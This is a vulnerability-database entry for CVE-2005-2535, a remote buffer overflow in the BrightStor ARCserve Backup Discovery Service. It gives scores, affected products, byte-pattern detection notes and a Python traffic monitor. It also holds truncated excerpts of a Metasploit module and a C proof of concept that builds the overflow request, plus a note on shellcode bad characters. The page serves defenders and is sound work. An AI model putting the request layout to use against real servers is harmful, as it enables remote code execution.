CVE-2005-2535
Published: 2005-08-10
Priority: P263, high · CVSS 2.0: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Exploit available · EPSS: 80.87% (99.6th percentile)
Buffer overflow in the Discovery Service in BrightStor ARCserve Backup 9.0 through 11.1 allows remote attackers to execute arbitrary commands via a large packet to TCP port 41523, a different vulnerability than CVE-2005-0260.
Affected
10 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| broadcom | arcserve_backup_2000 | — | — |
| broadcom | brightstor_arcserve_backup | — | — |
| broadcom | brightstor_arcserve_backup | — | — |
| broadcom | brightstor_arcserve_backup | — | — |
| broadcom | brightstor_arcserve_backup | — | — |
| broadcom | brightstor_arcserve_backup | — | — |
| broadcom | brightstor_arcserve_backup_hp | — | — |
| broadcom | brightstor_enterprise_backup | — | — |
| broadcom | brightstor_enterprise_backup | — | — |
| broadcom | brightstor_enterprise_backup | — | — |
Detection & IOCs
Byte pattern:
0x9b 'SERVICEPC' 0x18 [4-byte IP] 'SERVICEPC' 0x01 0x0c 0x6c 0x93 0xce 0x18 0x18 0x41 [overflow buffer]
- Detect exploit attempts by monitoring for large TCP packets (>1024 bytes) to port 41523 that begin with the byte 0x9b followed by the ASCII string 'SERVICEPC'.
- The payload bad-char constraint is only null bytes (0x00); any other byte value may appear in the shellcode stream on TCP/41523.
- The PoC fills the overflow buffer with 0x41 ('A') bytes beyond the header; a buffer of 4096 bytes starting with 0x9b+SERVICEPC and padded with 0x41 is a strong indicator of exploitation.
- The module author notes the vulnerability 'affects all known versions of the BrightStor product', so version-based filtering alone is insufficient for scoping detection.
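The detection notes above, as an added example (not code from this page or its sources): a per-flow check that counts client-to-server bytes across segments, since a 4096-byte request to TCP/41523 arrives in several packets that can each be under 1024 bytes. `DiscoveryMonitor`, `FILLER_RUN` and `HEAD_KEEP` are names and values assumed for illustration; the traffic in `demo()` is constructed.

```python
from collections import defaultdict

DISCOVERY_PORT = 41523        # Discovery Service TCP listener named in the advisory
MAGIC = b"\x9bSERVICEPC"      # 0x9b followed by ASCII 'SERVICEPC'
SIZE_THRESHOLD = 1024         # "large packet" threshold from the detection note
FILLER_RUN = 64               # assumption: repeated-byte run length treated as padding
HEAD_KEEP = 256               # assumption: bytes retained per flow for inspection


def longest_run(data):
    """Length of the longest run of one repeated byte value."""
    best = run = 0
    prev = None
    for b in data:
        run = run + 1 if b == prev else 1
        prev = b
        best = max(best, run)
    return best


class DiscoveryMonitor:
    """Tracks client-to-server bytes per flow instead of judging single packets."""

    def __init__(self):
        self.flows = defaultdict(lambda: {"head": b"", "size": 0, "alerted": False})

    def feed(self, flow, dst_port, segment):
        """Add one in-order segment; return the reasons once per flow, else None."""
        if dst_port != DISCOVERY_PORT:
            return None
        st = self.flows[flow]
        st["head"] = (st["head"] + segment)[:HEAD_KEEP]
        st["size"] += len(segment)
        if st["alerted"] or st["size"] <= SIZE_THRESHOLD or not st["head"].startswith(MAGIC):
            return None
        st["alerted"] = True
        reasons = ["magic", "oversize"]
        if longest_run(st["head"][len(MAGIC):]) >= FILLER_RUN:
            reasons.append("filler-run")   # PoC-style 0x41 padding; not required to alert
        return reasons


def demo():
    """Constructed traffic: a padded request in 512-byte segments, then a short request."""
    mon = DiscoveryMonitor()
    padded = MAGIC + b"\x41" * (4096 - len(MAGIC))
    segs = [padded[i:i + 512] for i in range(0, len(padded), 512)]
    hits = [mon.feed("flow-a", DISCOVERY_PORT, s) for s in segs]
    short = mon.feed("flow-b", DISCOVERY_PORT, MAGIC + b"\x00" * 40)
    return hits, short
```

The alert keys on the header plus cumulative size; the filler run is reported only as supporting evidence, because the notes above state that any non-null byte may follow the header.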
No detection rules found.
Exploit-DB
CA BrightStor Discovery Service - TCP Overflow (Metasploit)
exploitdb·2010-04-30
---
```ruby
##
# $Id: discovery_tcp.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'CA BrightStor Discovery Service TCP Overflow',
  'Description' => %q{
    This module exploits a vulnerability in the CA BrightStor
    Discovery Service. This vulnerability occurs when a specific
    type of request is sent to the TCP listener on port 41523.
    This vulnerability was discovered by cybertronic[at]gmx.net
    and affects all known versions of the BrightStor product.
    This modu
```
Exploit-DB
CA BrightStor ARCserve Backup - Remote Buffer Overflow (PoC)
exploitdb·2005-02-12
---
```c
/*
 * BrightStor ARCserve Backup buffer overflow PoC
 * [email protected]
 *
 */
#include
#include
#include
#include
#include
#include
#define RED "\E[31m\E[1m"
#define GREEN "\E[32m\E[1m"
#define YELLOW "\E[33m\E[1m"
#define BLUE "\E[34m\E[1m"
#define NORMAL "\E[m"
#define PORT 41523
void
start ( int s )
{
    char buffer[4096];
    bzero ( &buffer, 4096 );
    memset ( buffer, 0x41, 50 );
    buffer[0] = 0x9b;
    buffer[1] = 0x53; //S
    buffer[2] = 0x45; //E
    buffer[3] = 0x52; //R
    buffer[4] = 0x56; //V
    buffer[5] = 0x49; //I
    buffer[6] = 0x43; //C
    buffer[7] = 0x45; //E
    buffer[8] = 0x50; //P
    buffer[9] = 0x43; //C
    buffer[17] = 0x18;
    buffer[21] = 0xc0;
    buffer[22] = 0xa8;
    buffer[23] = 0x02;
    buffer[24] = 0x67;
    buffer[25] = 0x53; //S
    buffer[26] = 0
```
Metasploit
CA BrightStor Discovery Service TCP Overflow
metasploit
This module exploits a vulnerability in the CA BrightStor Discovery Service. This vulnerability occurs when a specific type of request is sent to the TCP listener on port 41523. This vulnerability was discovered by cybertronic[at]gmx.net and affects all known versions of the BrightStor product. This module is based on the 'cabrightstor_disco' exploit by HD Moore.
No writeups or analysis indexed.
References
- http://archives.neohapsis.com/archives/bugtraq/2005-02/0123.html
- http://archives.neohapsis.com/archives/bugtraq/2005-02/0141.html
- http://archives.neohapsis.com/archives/bugtraq/2005-02/0201.html
- http://secunia.com/advisories/14293
- http://www.kb.cert.org/vuls/id/966880
- http://www.osvdb.org/13814
- http://www.securityfocus.com/bid/12536
- http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?ID=32478
- https://exchange.xforce.ibmcloud.com/vulnerabilities/19320
Published: 2005-08-10